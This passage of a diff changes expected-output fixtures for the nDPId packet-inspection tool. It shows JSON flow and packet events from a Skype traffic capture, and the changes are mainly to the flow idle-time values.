-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1431969770913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770913,"pkt":"PBXCt3IO0NQSxnP1CABFAABAAItAAHMG9alH7gfLwKgBIklPw9gmoqm+ivhR2LAS\/\/9qHAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2929,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1431969770913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fUhAAEAGq\/jAqAEiR+4Hy8PYSU+K+FHYJqKpv4AQECzd4gAAAQEICj4kfqwAAAAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2934,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1431969770978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969770978,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9eajaZMJ5d2wKAScSAAYwAAAgQFrAQCCAq+obooPiR90gEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2935,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1431969770978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770978,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05SBAAEAGpivAqAEiTKehBsPXTzInl3bAmo2mTYAQECyPAQAAAQEICj4kfuy+oboo"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXBhAAEAGzRzAqAEiR+4Hy8PaSU8uFQxlAAAAALAC\/\/8djQAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZhxAAEAGUfzAqAEiBfi63cPbeSJooXaIAAAAALAC\/\/\/X7AAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2953,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1431969771918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771918,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2bNAAHIGrGQF+LrdwKgBInkiw9s0p7etaKF2ibASRBBmywAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2954,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1431969771919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969771919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HKZAAEAGm37AqAEiBfi63cPbeSJooXaJNKe3roAQECwaugAAAQEICj4kgpQAAAAA"} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1431969772021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969772021,"pkt":"PBXCt3IO0NQSxnP1CABFAABAALFAAHMG9YNH7gfLwKgBIklPw9pIXx9TLhUMZrAS\/\/91HgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1431969772021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969772021,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TOFAAEAG3F\/AqAEiR+4Hy8PaSU8uFQxmSF8fVIAQECzklgAAAQEICj4kgvoAAAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969774806,"flow_last_seen":1431969774806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969774806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1431969774806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969774806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnFAAEAGyM7AqAEiTKehBsPcTzIA95PqAAAAALAC\/\/8TqQAAAgQFtAEDAwUBAQgKPiSNxwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3061,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969776480,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9wNTHkCAPeT66AScSCe6QAAAgQFrAQCCAq+oc+oPiSNxwEDAwc="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3062,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969776480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo01NAAEAGuATAqAEiTKehBsPcTzIA95PrAAAAAFAEAABYdwAA"} -00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969642336,"flow_last_seen":1431969661480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969783628,"flow_last_seen":1431969783628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969783628,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1431969783628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783628,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJsBAAEAG06bAqAEiUA4uecPdET\/5wLoiAAAAALAC\/\/9\/YwAAAgQFtAEDAwUBAQgKPiSwIwAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":1431969783723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969783723,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoepAAHQGJHxQDi55wKgBIhE\/w92tjxb3+cC6I7AS\/\/+oHwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3109,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":3,"flow_last_seen":1431969783723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969783723,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sYlAAEAGSOnAqAEiUA4uecPdET\/5wLojrY8W+IAQECzqDwAAAQEICj4ksIIAAAAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969784741,"flow_last_seen":1431969784741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969784741,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3119,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1431969784741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784741,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOglAAEAGwF3AqAEiUA4uecPeET+tjIdjAAAAALAC\/\/\/6AAAAAgQFtAEDAwUBAQgKPiS0eAAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3120,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1431969784827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969784827,"pkt":"PBXCt3IO0NQSxnP1CABFAABAogNAAHQGJGNQDi55wKgBIhE\/w94bo3ajrYyHZLAS\/\/9ZUgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3121,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1431969784827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969784827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03GtAAEAGHgfAqAEiUA4uecPeET+tjIdkG6N2pIAQECyW9gAAAQEICj4ktM4AAAAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969788719,"flow_last_seen":1431969788719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969788719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3167,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1431969788719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969788719,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtCpAAEAGk4XAqAEiTsric8PfcYPq0olRAAAAALAC\/\/+YTgAAAgQFtAEDAwUBAQgKPiTD+gAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3171,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1431969788813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969788813,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8euxAAHMGmcdOyuJzwKgBInGDw984j2+76tKJUqASIAAVbgAAAgQFrAEDAwgEAggKAlDJPj4kw\/o="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3172,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1431969788813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969788813,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00tZAAEAGdOXAqAEiTsric8PfcYPq0olSOI9vvIAQECxTqwAAAQEICj4kxFYCUMk+"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABArS9AAEAG3hDAqAEiTKehBsPXTzInl3a\/AAAAALAC\/\/8aLgAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABALoZAAEAG+q7AqAEiR+4Hy8PYSU+K+FHXAAAAALAC\/\/9\/iwAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQGxAAEAGd6zAqAEiBfi63cPZeSJOVOkRAAAAALAC\/\/+EAwAAAgQFtAEDAwUBAQgKPiR90wAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2924,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1431969770813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770813,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2Z5AAHIGrHkF+LrdwKgBInkiw9nUmdR+TlTpErASRBBRzQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2925,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1431969770814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770814,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mqxAAEAGHXjAqAEiBfi63cPZeSJOVOkS1JnUf4AQECwKBgAAAQEICj4kfkoAAAAA"} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1431969770913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770913,"pkt":"PBXCt3IO0NQSxnP1CABFAABAAItAAHMG9alH7gfLwKgBIklPw9gmoqm+ivhR2LAS\/\/9qHAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2929,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1431969770913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fUhAAEAGq\/jAqAEiR+4Hy8PYSU+K+FHYJqKpv4AQECzd4gAAAQEICj4kfqwAAAAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2934,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1431969770978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969770978,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9eajaZMJ5d2wKAScSAAYwAAAgQFrAQCCAq+obooPiR90gEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2935,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1431969770978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770978,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05SBAAEAGpivAqAEiTKehBsPXTzInl3bAmo2mTYAQECyPAQAAAQEICj4kfuy+oboo"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXBhAAEAGzRzAqAEiR+4Hy8PaSU8uFQxlAAAAALAC\/\/8djQAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZhxAAEAGUfzAqAEiBfi63cPbeSJooXaIAAAAALAC\/\/\/X7AAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} 